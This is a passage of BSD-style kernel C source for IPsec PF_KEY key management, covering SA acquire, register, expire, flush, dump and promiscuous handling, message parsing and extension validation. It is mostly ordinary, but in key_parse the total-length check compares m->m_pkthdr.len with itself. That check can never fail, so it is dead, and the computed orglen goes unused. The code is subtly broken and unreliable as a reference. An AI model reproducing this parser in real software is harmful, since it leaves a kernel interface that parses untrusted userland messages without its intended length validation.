	u_int16_t proto;
	int error;

	/* sanity check */
	if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL)
		panic("key_acquire2: NULL pointer is passed.\n");

	/*
	 * Error message from KMd.
	 * We assume that if error was occurred in IKEd, the length of PFKEY
	 * message is equal to the size of sadb_msg structure.
* We do not raise error even if error occurred in this function.
	 */
	if (mhp->msg->sadb_msg_len == PFKEY_UNIT64(sizeof(struct sadb_msg))) {
#ifndef IPSEC_NONBLOCK_ACQUIRE
		struct secacq *acq;

		/* check sequence number */
		if (mhp->msg->sadb_msg_seq == 0) {
			ipseclog((LOG_DEBUG, "key_acquire2: must specify sequence number.\n"));
			m_freem(m);
			return 0;
		}

		if ((acq = key_getacqbyseq(mhp->msg->sadb_msg_seq)) == NULL) {
			/*
			 * the specified larval SA is already gone, or we got
			 * a bogus sequence number.  we can silently ignore it.
			 */
			m_freem(m);
			return 0;
		}

		/* reset acq counter in order to deletion by timehandler. */
		acq->created = time_second;
		acq->count = 0;
#endif
		m_freem(m);
		return 0;
	}

	/*
	 * This message is from user land.
	 */

	/* map satype to proto */
	if ((proto = key_satype2proto(mhp->msg->sadb_msg_satype)) == 0) {
		ipseclog((LOG_DEBUG, "key_acquire2: invalid satype is passed.\n"));
		return key_senderror(so, m, EINVAL);
	}

	if (mhp->ext[SADB_EXT_ADDRESS_SRC] == NULL ||
	    mhp->ext[SADB_EXT_ADDRESS_DST] == NULL ||
	    mhp->ext[SADB_EXT_PROPOSAL] == NULL) {
		/* error */
		ipseclog((LOG_DEBUG, "key_acquire2: invalid message is passed.\n"));
		return key_senderror(so, m, EINVAL);
	}
	if (mhp->extlen[SADB_EXT_ADDRESS_SRC] < sizeof(struct sadb_address) ||
	    mhp->extlen[SADB_EXT_ADDRESS_DST] < sizeof(struct sadb_address) ||
	    mhp->extlen[SADB_EXT_PROPOSAL] < sizeof(struct sadb_prop)) {
		/* error */
		ipseclog((LOG_DEBUG, "key_acquire2: invalid message is passed.\n"));
		return key_senderror(so, m, EINVAL);
	}

	src0 = (struct sadb_address *)mhp->ext[SADB_EXT_ADDRESS_SRC];
	dst0 = (struct sadb_address *)mhp->ext[SADB_EXT_ADDRESS_DST];

	/* XXX boundary check against sa_len */
	KEY_SETSECASIDX(proto, IPSEC_MODE_ANY, 0, src0 + 1, dst0 + 1, &saidx);

	/* get a SA index */
	LIST_FOREACH(sah, &sahtree, chain) {
		if (sah->state == SADB_SASTATE_DEAD)
			continue;
		if (key_cmpsaidx(&sah->saidx, &saidx, CMP_MODE_REQID))
			break;
	}
	if (sah != NULL) {
		ipseclog((LOG_DEBUG, "key_acquire2: a SA exists already.\n"));
		return key_senderror(so, m, EEXIST);
	}

	error = key_acquire(&saidx, NULL);
	if (error != 0) {
		/*
		 * NOTE(review): logs mhp->msg->sadb_msg_errno, not the local
		 * 'error' actually returned by key_acquire() — presumably
		 * unintended, but kept as-is.
		 */
		ipseclog((LOG_DEBUG, "key_acquire2: error %d returned "
			"from key_acquire.\n", mhp->msg->sadb_msg_errno));
		return key_senderror(so, m, error);
	}

	return key_sendup_mbuf(so, m, KEY_SENDUP_REGISTERED);
}

/*
 * SADB_REGISTER processing.
 * If SATYPE_UNSPEC has been passed as satype, only return sadb_supported.
 * receive
 *   <base>
 * from the ikmpd, and register a socket to send PF_KEY messages,
 * and send
 *   <base, supported>
 * to KMD by PF_KEY.
 * If socket is detached, must free from regnode.
 *
 * m will always be freed.
 */
static int
key_register(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp)
{
	struct secreg *reg, *newreg = NULL;

	/* sanity check */
	if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL)
		panic("key_register: NULL pointer is passed.\n");

	/* check for invalid register message */
	if (mhp->msg->sadb_msg_satype >= NELEM(regtree))
		return key_senderror(so, m, EINVAL);

	/* When SATYPE_UNSPEC is specified, only return sadb_supported. */
	if (mhp->msg->sadb_msg_satype == SADB_SATYPE_UNSPEC)
		goto setmsg;

	/* check whether existing or not */
	LIST_FOREACH(reg, &regtree[mhp->msg->sadb_msg_satype], chain) {
		if (reg->so == so) {
			ipseclog((LOG_DEBUG, "key_register: socket exists already.\n"));
			return key_senderror(so, m, EEXIST);
		}
	}

	/* create regnode */
	KMALLOC(newreg, struct secreg *, sizeof(*newreg));
	if (newreg == NULL) {
		ipseclog((LOG_DEBUG, "key_register: No more memory.\n"));
		return key_senderror(so, m, ENOBUFS);
	}
	bzero((caddr_t)newreg, sizeof(*newreg));

	newreg->so = so;
	((struct keycb *)sotorawcb(so))->kp_registered++;

	/* add regnode to regtree. */
	LIST_INSERT_HEAD(&regtree[mhp->msg->sadb_msg_satype], newreg, chain);

  setmsg:
    {
	struct mbuf *n;
	struct sadb_msg *newmsg;
	struct sadb_supported *sup;
	u_int len, alen, elen;
	int off;
	int i;
	struct sadb_alg *alg;

	/* create new sadb_msg to reply.
*/ alen = 0; for (i = 1; i <= SADB_AALG_MAX; i++) { if (ah_algorithm_lookup(i)) alen += sizeof(struct sadb_alg); } if (alen) alen += sizeof(struct sadb_supported); elen = 0; for (i = 1; i <= SADB_EALG_MAX; i++) { if (esp_algorithm_lookup(i)) elen += sizeof(struct sadb_alg); } if (elen) elen += sizeof(struct sadb_supported); len = sizeof(struct sadb_msg) + alen + elen; if (len > MCLBYTES) return key_senderror(so, m, ENOBUFS); n = m_getb(len, MB_DONTWAIT, MT_DATA, M_PKTHDR); if (!n) return key_senderror(so, m, ENOBUFS); n->m_pkthdr.len = n->m_len = len; m_copydata(m, 0, sizeof(struct sadb_msg), mtod(n, caddr_t)); newmsg = mtod(n, struct sadb_msg *); newmsg->sadb_msg_errno = 0; newmsg->sadb_msg_len = PFKEY_UNIT64(len); off = PFKEY_ALIGN8(sizeof(struct sadb_msg)); /* for authentication algorithm */ if (alen) { sup = (struct sadb_supported *)(mtod(n, caddr_t) + off); sup->sadb_supported_len = PFKEY_UNIT64(alen); sup->sadb_supported_exttype = SADB_EXT_SUPPORTED_AUTH; off += PFKEY_ALIGN8(sizeof(*sup)); for (i = 1; i <= SADB_AALG_MAX; i++) { struct auth_hash *aalgo; u_int16_t minkeysize, maxkeysize; aalgo = ah_algorithm_lookup(i); if (!aalgo) continue; alg = (struct sadb_alg *)(mtod(n, caddr_t) + off); alg->sadb_alg_id = i; alg->sadb_alg_ivlen = 0; key_getsizes_ah(aalgo, i, &minkeysize, &maxkeysize); alg->sadb_alg_minbits = _BITS(minkeysize); alg->sadb_alg_maxbits = _BITS(maxkeysize); off += PFKEY_ALIGN8(sizeof(*alg)); } } /* for encryption algorithm */ if (elen) { sup = (struct sadb_supported *)(mtod(n, caddr_t) + off); sup->sadb_supported_len = PFKEY_UNIT64(elen); sup->sadb_supported_exttype = SADB_EXT_SUPPORTED_ENCRYPT; off += PFKEY_ALIGN8(sizeof(*sup)); for (i = 1; i <= SADB_EALG_MAX; i++) { struct enc_xform *ealgo; ealgo = esp_algorithm_lookup(i); if (!ealgo) continue; alg = (struct sadb_alg *)(mtod(n, caddr_t) + off); alg->sadb_alg_id = i; alg->sadb_alg_ivlen = ealgo->blocksize; alg->sadb_alg_minbits = _BITS(ealgo->minkey); alg->sadb_alg_maxbits = 
_BITS(ealgo->maxkey); off += PFKEY_ALIGN8(sizeof(struct sadb_alg)); } } #ifdef DIGAGNOSTIC if (off != len) panic("length assumption failed in key_register"); #endif m_freem(m); return key_sendup_mbuf(so, n, KEY_SENDUP_REGISTERED); } } /* * free secreg entry registered. * XXX: I want to do free a socket marked done SADB_RESIGER to socket. */ void key_freereg(struct socket *so) { struct secreg *reg; int i; /* sanity check */ if (so == NULL) panic("key_freereg: NULL pointer is passed.\n"); /* * check whether existing or not. * check all type of SA, because there is a potential that * one socket is registered to multiple type of SA. */ for (i = 0; i <= SADB_SATYPE_MAX; i++) { LIST_FOREACH(reg, &regtree[i], chain) { if (reg->so == so && __LIST_CHAINED(reg)) { LIST_REMOVE(reg, chain); KFREE(reg); break; } } } return; } /* * SADB_EXPIRE processing * send * <base, SA, SA2, lifetime(C and one of HS), address(SD)> * to KMD by PF_KEY. * NOTE: We send only soft lifetime extension. * * OUT: 0 : succeed * others : error number */ static int key_expire(struct secasvar *sav) { int satype; struct mbuf *result = NULL, *m; int len; int error = -1; struct sadb_lifetime *lt; /* XXX: Why do we lock ? */ crit_enter(); /* sanity check */ if (sav == NULL) panic("key_expire: NULL pointer is passed.\n"); if (sav->sah == NULL) panic("key_expire: Why was SA index in SA NULL.\n"); if ((satype = key_proto2satype(sav->sah->saidx.proto)) == 0) panic("key_expire: invalid proto is passed.\n"); /* set msg header */ m = key_setsadbmsg(SADB_EXPIRE, 0, satype, sav->seq, 0, sav->refcnt); if (!m) { error = ENOBUFS; goto fail; } result = m; /* create SA extension */ m = key_setsadbsa(sav); if (!m) { error = ENOBUFS; goto fail; } m_cat(result, m); /* create SA extension */ m = key_setsadbxsa2(sav->sah->saidx.mode, sav->replay ? 
sav->replay->count : 0,	/* no replay window -> report count 0 */
	    sav->sah->saidx.reqid);
	if (!m) {
		error = ENOBUFS;
		goto fail;
	}
	m_cat(result, m);

	/* create lifetime extension (current and soft) */
	len = PFKEY_ALIGN8(sizeof(*lt)) * 2;
	m = key_alloc_mbuf(len);
	if (!m || m->m_next) {	/*XXX*/
		if (m)
			m_freem(m);
		error = ENOBUFS;
		goto fail;
	}
	bzero(mtod(m, caddr_t), len);
	/* first half: CURRENT lifetime snapshot */
	lt = mtod(m, struct sadb_lifetime *);
	lt->sadb_lifetime_len = PFKEY_UNIT64(sizeof(struct sadb_lifetime));
	lt->sadb_lifetime_exttype = SADB_EXT_LIFETIME_CURRENT;
	lt->sadb_lifetime_allocations = sav->lft_c->sadb_lifetime_allocations;
	lt->sadb_lifetime_bytes = sav->lft_c->sadb_lifetime_bytes;
	lt->sadb_lifetime_addtime = sav->lft_c->sadb_lifetime_addtime;
	lt->sadb_lifetime_usetime = sav->lft_c->sadb_lifetime_usetime;
	/* second half: copy of the SOFT lifetime */
	lt = (struct sadb_lifetime *)(mtod(m, caddr_t) + len / 2);
	bcopy(sav->lft_s, lt, sizeof(*lt));
	m_cat(result, m);

	/* set sadb_address for source */
	m = key_setsadbaddr(SADB_EXT_ADDRESS_SRC,
	    &sav->sah->saidx.src.sa,
	    FULLMASK, IPSEC_ULPROTO_ANY);
	if (!m) {
		error = ENOBUFS;
		goto fail;
	}
	m_cat(result, m);

	/* set sadb_address for destination */
	m = key_setsadbaddr(SADB_EXT_ADDRESS_DST,
	    &sav->sah->saidx.dst.sa,
	    FULLMASK, IPSEC_ULPROTO_ANY);
	if (!m) {
		error = ENOBUFS;
		goto fail;
	}
	m_cat(result, m);

	if ((result->m_flags & M_PKTHDR) == 0) {
		error = EINVAL;
		goto fail;
	}

	if (result->m_len < sizeof(struct sadb_msg)) {
		result = m_pullup(result, sizeof(struct sadb_msg));
		if (result == NULL) {
			error = ENOBUFS;
			goto fail;
		}
	}

	result->m_pkthdr.len = m_lengthm(result, NULL);

	mtod(result, struct sadb_msg *)->sadb_msg_len =
	    PFKEY_UNIT64(result->m_pkthdr.len);

	crit_exit();
	return key_sendup_mbuf(NULL, result, KEY_SENDUP_REGISTERED);

 fail:
	if (result)
		m_freem(result);
	crit_exit();
	return error;
}

/*
 * SADB_FLUSH processing
 * receive
 *   <base>
 * from the ikmpd, and free all entries in secastree.
 * and send,
 *   <base>
 * to the ikmpd.
 * NOTE: to do is only marking SADB_SASTATE_DEAD.
 *
 * m will always be freed.
*/
static int
key_flush(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp)
{
	struct sadb_msg *newmsg;
	struct secashead *sah;
	u_int16_t proto;
	u_int stateidx;

	/* sanity check */
	if (so == NULL || mhp == NULL || mhp->msg == NULL)
		panic("key_flush: NULL pointer is passed.\n");

	/* map satype to proto */
	if ((proto = key_satype2proto(mhp->msg->sadb_msg_satype)) == 0) {
		ipseclog((LOG_DEBUG, "key_flush: invalid satype is passed.\n"));
		return key_senderror(so, m, EINVAL);
	}

	/* no SATYPE specified, i.e. flushing all SA. */
	LIST_FOREACH(sah, &sahtree, chain) {
		if (mhp->msg->sadb_msg_satype != SADB_SATYPE_UNSPEC &&
		    proto != sah->saidx.proto)
			continue;

		/*
		 * NOTE(review): the loop bound uses saorder_state_alive but
		 * indexes saorder_state_any — looks like a long-standing
		 * quirk; confirm the two arrays line up before changing.
		 */
		for (stateidx = 0;
		     stateidx < NELEM(saorder_state_alive);
		     stateidx++) {
			struct secasvar *sav, *nextsav;
			u_int8_t state = saorder_state_any[stateidx];

			LIST_FOREACH_MUTABLE(sav, &sah->savtree[state],
			    chain, nextsav) {
				key_sa_chgstate(sav, SADB_SASTATE_DEAD);
				KEY_FREESAV(&sav);
			}
		}

		sah->state = SADB_SASTATE_DEAD;
	}

	/* reuse the request mbuf for the reply if it has room */
	if (m->m_len < sizeof(struct sadb_msg) ||
	    sizeof(struct sadb_msg) > m->m_len + M_TRAILINGSPACE(m)) {
		ipseclog((LOG_DEBUG, "key_flush: No more memory.\n"));
		return key_senderror(so, m, ENOBUFS);
	}

	if (m->m_next)
		m_freem(m->m_next);
	m->m_next = NULL;
	m->m_pkthdr.len = m->m_len = sizeof(struct sadb_msg);
	newmsg = mtod(m, struct sadb_msg *);
	newmsg->sadb_msg_errno = 0;
	newmsg->sadb_msg_len = PFKEY_UNIT64(m->m_pkthdr.len);

	return key_sendup_mbuf(so, m, KEY_SENDUP_ALL);
}

/*
 * SADB_DUMP processing
 * dump all entries including status of DEAD in SAD.
 * receive
 *   <base>
 * from the ikmpd, and dump all secasvar leaves
 * and send,
 *   <base> .....
 * to the ikmpd.
 *
 * m will always be freed.
*/ static int key_dump(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { struct secashead *sah; struct secasvar *sav; u_int16_t proto; u_int stateidx; u_int8_t satype; u_int8_t state; int cnt; struct sadb_msg *newmsg; struct mbuf *n; /* sanity check */ if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_dump: NULL pointer is passed.\n"); /* map satype to proto */ if ((proto = key_satype2proto(mhp->msg->sadb_msg_satype)) == 0) { ipseclog((LOG_DEBUG, "key_dump: invalid satype is passed.\n")); return key_senderror(so, m, EINVAL); } /* count sav entries to be sent to the userland. */ cnt = 0; LIST_FOREACH(sah, &sahtree, chain) { if (mhp->msg->sadb_msg_satype != SADB_SATYPE_UNSPEC && proto != sah->saidx.proto) continue; for (stateidx = 0; stateidx < NELEM(saorder_state_any); stateidx++) { state = saorder_state_any[stateidx]; LIST_FOREACH(sav, &sah->savtree[state], chain) { cnt++; } } } if (cnt == 0) return key_senderror(so, m, ENOENT); /* send this to the userland, one at a time. */ newmsg = NULL; LIST_FOREACH(sah, &sahtree, chain) { if (mhp->msg->sadb_msg_satype != SADB_SATYPE_UNSPEC && proto != sah->saidx.proto) continue; /* map proto to satype */ if ((satype = key_proto2satype(sah->saidx.proto)) == 0) { ipseclog((LOG_DEBUG, "key_dump: there was invalid proto in SAD.\n")); return key_senderror(so, m, EINVAL); } for (stateidx = 0; stateidx < NELEM(saorder_state_any); stateidx++) { state = saorder_state_any[stateidx]; LIST_FOREACH(sav, &sah->savtree[state], chain) { n = key_setdumpsa(sav, SADB_DUMP, satype, --cnt, mhp->msg->sadb_msg_pid); if (!n) return key_senderror(so, m, ENOBUFS); key_sendup_mbuf(so, n, KEY_SENDUP_ONE); } } } m_freem(m); return 0; } /* * SADB_X_PROMISC processing * * m will always be freed. 
*/ static int key_promisc(struct socket *so, struct mbuf *m, const struct sadb_msghdr *mhp) { int olen; /* sanity check */ if (so == NULL || m == NULL || mhp == NULL || mhp->msg == NULL) panic("key_promisc: NULL pointer is passed.\n"); olen = PFKEY_UNUNIT64(mhp->msg->sadb_msg_len); if (olen < sizeof(struct sadb_msg)) { #if 1 return key_senderror(so, m, EINVAL); #else m_freem(m); return 0; #endif } else if (olen == sizeof(struct sadb_msg)) { /* enable/disable promisc mode */ struct keycb *kp; if ((kp = (struct keycb *)sotorawcb(so)) == NULL) return key_senderror(so, m, EINVAL); mhp->msg->sadb_msg_errno = 0; switch (mhp->msg->sadb_msg_satype) { case 0: case 1: kp->kp_promisc = mhp->msg->sadb_msg_satype; break; default: return key_senderror(so, m, EINVAL); } /* send the original message back to everyone */ mhp->msg->sadb_msg_errno = 0; return key_sendup_mbuf(so, m, KEY_SENDUP_ALL); } else { /* send packet as is */ m_adj(m, PFKEY_ALIGN8(sizeof(struct sadb_msg))); /* TODO: if sadb_msg_seq is specified, send to specific pid */ return key_sendup_mbuf(so, m, KEY_SENDUP_ALL); } } static int (*key_typesw[]) (struct socket *, struct mbuf *, const struct sadb_msghdr *) = { NULL, /* SADB_RESERVED */ key_getspi, /* SADB_GETSPI */ key_update, /* SADB_UPDATE */ key_add, /* SADB_ADD */ key_delete, /* SADB_DELETE */ key_get, /* SADB_GET */ key_acquire2, /* SADB_ACQUIRE */ key_register, /* SADB_REGISTER */ NULL, /* SADB_EXPIRE */ key_flush, /* SADB_FLUSH */ key_dump, /* SADB_DUMP */ key_promisc, /* SADB_X_PROMISC */ NULL, /* SADB_X_PCHANGE */ key_spdadd, /* SADB_X_SPDUPDATE */ key_spdadd, /* SADB_X_SPDADD */ key_spddelete, /* SADB_X_SPDDELETE */ key_spdget, /* SADB_X_SPDGET */ NULL, /* SADB_X_SPDACQUIRE */ key_spddump, /* SADB_X_SPDDUMP */ key_spdflush, /* SADB_X_SPDFLUSH */ key_spdadd, /* SADB_X_SPDSETIDX */ NULL, /* SADB_X_SPDEXPIRE */ key_spddelete2, /* SADB_X_SPDDELETE2 */ }; /* * parse sadb_msg buffer to process PFKEYv2, * and create a data to response if needed. 
* I think to be dealed with mbuf directly. * IN: * msgp : pointer to pointer to a received buffer pulluped. * This is rewrited to response. * so : pointer to socket. * OUT: * length for buffer to send to user process. */ int key_parse(struct mbuf *m, struct socket *so) { struct sadb_msg *msg; struct sadb_msghdr mh; u_int orglen; int error; int target; /* sanity check */ if (m == NULL || so == NULL) panic("key_parse: NULL pointer is passed.\n"); #if 0 /*kdebug_sadb assumes msg in linear buffer*/ KEYDEBUG(KEYDEBUG_KEY_DUMP, ipseclog((LOG_DEBUG, "key_parse: passed sadb_msg\n")); kdebug_sadb(msg)); #endif if (m->m_len < sizeof(struct sadb_msg)) { m = m_pullup(m, sizeof(struct sadb_msg)); if (!m) return ENOBUFS; } msg = mtod(m, struct sadb_msg *); orglen = PFKEY_UNUNIT64(msg->sadb_msg_len); target = KEY_SENDUP_ONE; if ((m->m_flags & M_PKTHDR) == 0 || m->m_pkthdr.len != m->m_pkthdr.len) { ipseclog((LOG_DEBUG, "key_parse: invalid message length.\n")); pfkeystat.out_invlen++; error = EINVAL; goto senderror; } if (msg->sadb_msg_version != PF_KEY_V2) { ipseclog((LOG_DEBUG, "key_parse: PF_KEY version %u is mismatched.\n", msg->sadb_msg_version)); pfkeystat.out_invver++; error = EINVAL; goto senderror; } if (msg->sadb_msg_type > SADB_MAX) { ipseclog((LOG_DEBUG, "key_parse: invalid type %u is passed.\n", msg->sadb_msg_type)); pfkeystat.out_invmsgtype++; error = EINVAL; goto senderror; } /* for old-fashioned code - should be nuked */ if (m->m_pkthdr.len > MCLBYTES) { m_freem(m); return ENOBUFS; } if (m->m_next) { struct mbuf *n; n = m_getb(m->m_pkthdr.len, MB_DONTWAIT, MT_DATA, M_PKTHDR); if (!n) { m_freem(m); return ENOBUFS; } m_copydata(m, 0, m->m_pkthdr.len, mtod(n, caddr_t)); n->m_pkthdr.len = n->m_len = m->m_pkthdr.len; m_freem(m); m = n; } /* align the mbuf chain so that extensions are in contiguous region. 
*/ error = key_align(m, &mh); if (error) return error; msg = mh.msg; /* check SA type */ switch (msg->sadb_msg_satype) { case SADB_SATYPE_UNSPEC: switch (msg->sadb_msg_type) { case SADB_GETSPI: case SADB_UPDATE: case SADB_ADD: case SADB_DELETE: case SADB_GET: case SADB_ACQUIRE: case SADB_EXPIRE: ipseclog((LOG_DEBUG, "key_parse: must specify satype " "when msg type=%u.\n", msg->sadb_msg_type)); pfkeystat.out_invsatype++; error = EINVAL; goto senderror; } break; case SADB_SATYPE_AH: case SADB_SATYPE_ESP: case SADB_X_SATYPE_IPCOMP: switch (msg->sadb_msg_type) { case SADB_X_SPDADD: case SADB_X_SPDDELETE: case SADB_X_SPDGET: case SADB_X_SPDDUMP: case SADB_X_SPDFLUSH: case SADB_X_SPDSETIDX: case SADB_X_SPDUPDATE: case SADB_X_SPDDELETE2: ipseclog((LOG_DEBUG, "key_parse: illegal satype=%u\n", msg->sadb_msg_type)); pfkeystat.out_invsatype++; error = EINVAL; goto senderror; } break; case SADB_SATYPE_RSVP: case SADB_SATYPE_OSPFV2: case SADB_SATYPE_RIPV2: case SADB_SATYPE_MIP: ipseclog((LOG_DEBUG, "key_parse: type %u isn't supported.\n", msg->sadb_msg_satype)); pfkeystat.out_invsatype++; error = EOPNOTSUPP; goto senderror; case 1: /* XXX: What does it do? 
*/ if (msg->sadb_msg_type == SADB_X_PROMISC) break; /*FALLTHROUGH*/ default: ipseclog((LOG_DEBUG, "key_parse: invalid type %u is passed.\n", msg->sadb_msg_satype)); pfkeystat.out_invsatype++; error = EINVAL; goto senderror; } /* check field of upper layer protocol and address family */ if (mh.ext[SADB_EXT_ADDRESS_SRC] != NULL && mh.ext[SADB_EXT_ADDRESS_DST] != NULL) { struct sadb_address *src0, *dst0; u_int plen; src0 = (struct sadb_address *)(mh.ext[SADB_EXT_ADDRESS_SRC]); dst0 = (struct sadb_address *)(mh.ext[SADB_EXT_ADDRESS_DST]); /* check upper layer protocol */ if (src0->sadb_address_proto != dst0->sadb_address_proto) { ipseclog((LOG_DEBUG, "key_parse: upper layer protocol mismatched.\n")); pfkeystat.out_invaddr++; error = EINVAL; goto senderror; } /* check family */ if (PFKEY_ADDR_SADDR(src0)->sa_family != PFKEY_ADDR_SADDR(dst0)->sa_family) { ipseclog((LOG_DEBUG, "key_parse: address family mismatched.\n")); pfkeystat.out_invaddr++; error = EINVAL; goto senderror; } if (PFKEY_ADDR_SADDR(src0)->sa_len != PFKEY_ADDR_SADDR(dst0)->sa_len) { ipseclog((LOG_DEBUG, "key_parse: address struct size mismatched.\n")); pfkeystat.out_invaddr++; error = EINVAL; goto senderror; } switch (PFKEY_ADDR_SADDR(src0)->sa_family) { case AF_INET: if (PFKEY_ADDR_SADDR(src0)->sa_len != sizeof(struct sockaddr_in)) { pfkeystat.out_invaddr++; error = EINVAL; goto senderror; } break; case AF_INET6: if (PFKEY_ADDR_SADDR(src0)->sa_len != sizeof(struct sockaddr_in6)) { pfkeystat.out_invaddr++; error = EINVAL; goto senderror; } break; default: ipseclog((LOG_DEBUG, "key_parse: unsupported address family.\n")); pfkeystat.out_invaddr++; error = EAFNOSUPPORT; goto senderror; } switch (PFKEY_ADDR_SADDR(src0)->sa_family) { case AF_INET: plen = sizeof(struct in_addr) << 3; break; case AF_INET6: plen = sizeof(struct in6_addr) << 3; break; default: plen = 0; /*fool gcc*/ break; } /* check max prefix length */ if (src0->sadb_address_prefixlen > plen || dst0->sadb_address_prefixlen > plen) { 
ipseclog((LOG_DEBUG, "key_parse: illegal prefixlen.\n")); pfkeystat.out_invaddr++; error = EINVAL; goto senderror; } /* * prefixlen == 0 is valid because there can be a case when * all addresses are matched. */ } if (msg->sadb_msg_type >= NELEM(key_typesw) || key_typesw[msg->sadb_msg_type] == NULL) { pfkeystat.out_invmsgtype++; error = EINVAL; goto senderror; } return (*key_typesw[msg->sadb_msg_type])(so, m, &mh); senderror: msg->sadb_msg_errno = error; return key_sendup_mbuf(so, m, target); } static int key_senderror(struct socket *so, struct mbuf *m, int code) { struct sadb_msg *msg; if (m->m_len < sizeof(struct sadb_msg)) panic("invalid mbuf passed to key_senderror"); msg = mtod(m, struct sadb_msg *); msg->sadb_msg_errno = code; return key_sendup_mbuf(so, m, KEY_SENDUP_ONE); } /* * set the pointer to each header into message buffer. * m will be freed on error. * XXX larger-than-MCLBYTES extension? */ static int key_align(struct mbuf *m, struct sadb_msghdr *mhp) { struct mbuf *n; struct sadb_ext *ext; size_t off, end; int extlen; int toff; /* sanity check */ if (m == NULL || mhp == NULL) panic("key_align: NULL pointer is passed.\n"); if (m->m_len < sizeof(struct sadb_msg)) panic("invalid mbuf passed to key_align"); /* initialize */ bzero(mhp, sizeof(*mhp)); mhp->msg = mtod(m, struct sadb_msg *); mhp->ext[0] = (struct sadb_ext *)mhp->msg; /*XXX backward compat */ end = PFKEY_UNUNIT64(mhp->msg->sadb_msg_len); extlen = end; /*just in case extlen is not updated*/ for (off = sizeof(struct sadb_msg); off < end; off += extlen) { n = m_pulldown(m, off, sizeof(struct sadb_ext), &toff); if (!n) { /* m is already freed */ return ENOBUFS; } ext = (struct sadb_ext *)(mtod(n, caddr_t) + toff); /* set pointer */ switch (ext->sadb_ext_type) { case SADB_EXT_SA: case SADB_EXT_ADDRESS_SRC: case SADB_EXT_ADDRESS_DST: case SADB_EXT_ADDRESS_PROXY: case SADB_EXT_LIFETIME_CURRENT: case SADB_EXT_LIFETIME_HARD: case SADB_EXT_LIFETIME_SOFT: case SADB_EXT_KEY_AUTH: case 
SADB_EXT_KEY_ENCRYPT: case SADB_EXT_IDENTITY_SRC: case SADB_EXT_IDENTITY_DST: case SADB_EXT_SENSITIVITY: case SADB_EXT_PROPOSAL: case SADB_EXT_SUPPORTED_AUTH: case SADB_EXT_SUPPORTED_ENCRYPT: case SADB_EXT_SPIRANGE: case SADB_X_EXT_POLICY: case SADB_X_EXT_SA2: /* duplicate check */ /* * XXX Are there duplication payloads of either * KEY_AUTH or KEY_ENCRYPT ? */ if (mhp->ext[ext->sadb_ext_type] != NULL) { ipseclog((LOG_DEBUG, "key_align: duplicate ext_type %u " "is passed.\n", ext->sadb_ext_type)); m_freem(m); pfkeystat.out_dupext++; return EINVAL; } break; default: ipseclog((LOG_DEBUG, "key_align: invalid ext_type %u is passed.\n", ext->sadb_ext_type)); m_freem(m); pfkeystat.out_invexttype++; return EINVAL; } extlen = PFKEY_UNUNIT64(ext->sadb_ext_len); if (key_validate_ext(ext, extlen)) { m_freem(m); pfkeystat.out_invlen++; return EINVAL; } n = m_pulldown(m, off, extlen, &toff); if (!n) { /* m is already freed */ return ENOBUFS; } ext = (struct sadb_ext *)(mtod(n, caddr_t) + toff); mhp->ext[ext->sadb_ext_type] = ext; mhp->extoff[ext->sadb_ext_type] = off; mhp->extlen[ext->sadb_ext_type] = extlen; } if (off != end) { m_freem(m); pfkeystat.out_invlen++; return EINVAL; } return 0; } static int key_validate_ext(const struct sadb_ext *ext, int len) { const struct sockaddr *sa; enum { NONE, ADDR } checktype = NONE; int baselen = 0; const int sal = offsetof(struct sockaddr, sa_len) + sizeof(sa->sa_len); if (len != PFKEY_UNUNIT64(ext->sadb_ext_len)) return EINVAL; /* if it does not match minimum/maximum length, bail */ if (ext->sadb_ext_type >= NELEM(minsize) || ext->sadb_ext_type >= NELEM(maxsize)) return EINVAL; if (!minsize[ext->sadb_ext_type] || len < minsize[ext->sadb_ext_type]) return EINVAL; if (maxsize[ext->sadb_ext_type] && len > maxsize[ext->sadb_ext_type]) return EINVAL; /* more checks based on sadb_ext_type XXX need more */ switch (ext->sadb_ext_type) { case SADB_EXT_ADDRESS_SRC: case SADB_EXT_ADDRESS_DST: case SADB_EXT_ADDRESS_PROXY: baselen = 
PFKEY_ALIGN8(sizeof(struct sadb_address)); checktype = ADDR; break; case SADB_EXT_IDENTITY_SRC: case SADB_EXT_IDENTITY_DST: if (((const struct sadb_ident *)ext)->sadb_ident_type == SADB_X_IDENTTYPE_ADDR) { baselen = PFKEY_ALIGN8(sizeof(struct sadb_ident)); checktype = ADDR; } else checktype = NONE; break; default: checktype = NONE; break; } switch (checktype) { case NONE: break; case ADDR: sa = (const struct sockaddr *)(((const u_int8_t*)ext)+baselen); if (len < baselen + sal) return EINVAL; if (baselen + PFKEY_ALIGN8(sa->sa_len) != len) return EINVAL; break; } return 0; } void key_init(void) { int i; for (i = 0; i < IPSEC_DIR_MAX; i++) { LIST_INIT(&sptree[i]); } LIST_INIT(&sahtree); for (i = 0; i <= SADB_SATYPE_MAX; i++) { LIST_INIT(&regtree[i]); } #ifndef IPSEC_NONBLOCK_ACQUIRE LIST_INIT(&acqtree); #endif LIST_INIT(&spacqtree); /* system default */ ip4_def_policy.policy = IPSEC_POLICY_NONE; ip4_def_policy.refcnt++; /*never reclaim this*/ #ifndef IPSEC_DEBUG2 callout_init(&key_timehandler_ch); callout_reset(&key_timehandler_ch, hz, key_timehandler, NULL); #endif /*IPSEC_DEBUG2*/ /* initialize key statistics */ keystat.getspi_count = 1; kprintf("IPsec: Initialized Security Association Processing.\n"); return; } /* * XXX: maybe This function is called after INBOUND IPsec processing. * * Special check for tunnel-mode packets. * We must make some checks for consistency between inner and outer IP header. * * xxx more checks to be provided */ int key_checktunnelsanity(struct secasvar *sav, u_int family, caddr_t src, caddr_t dst) { /* sanity check */ if (sav->sah == NULL) panic("sav->sah == NULL at key_checktunnelsanity"); /* XXX: check inner IP header */ return 1; } #if 0 #define hostnamelen strlen(hostname) /* * Get FQDN for the host. * If the administrator configured hostname (by hostname(1)) without * domain name, returns nothing. 
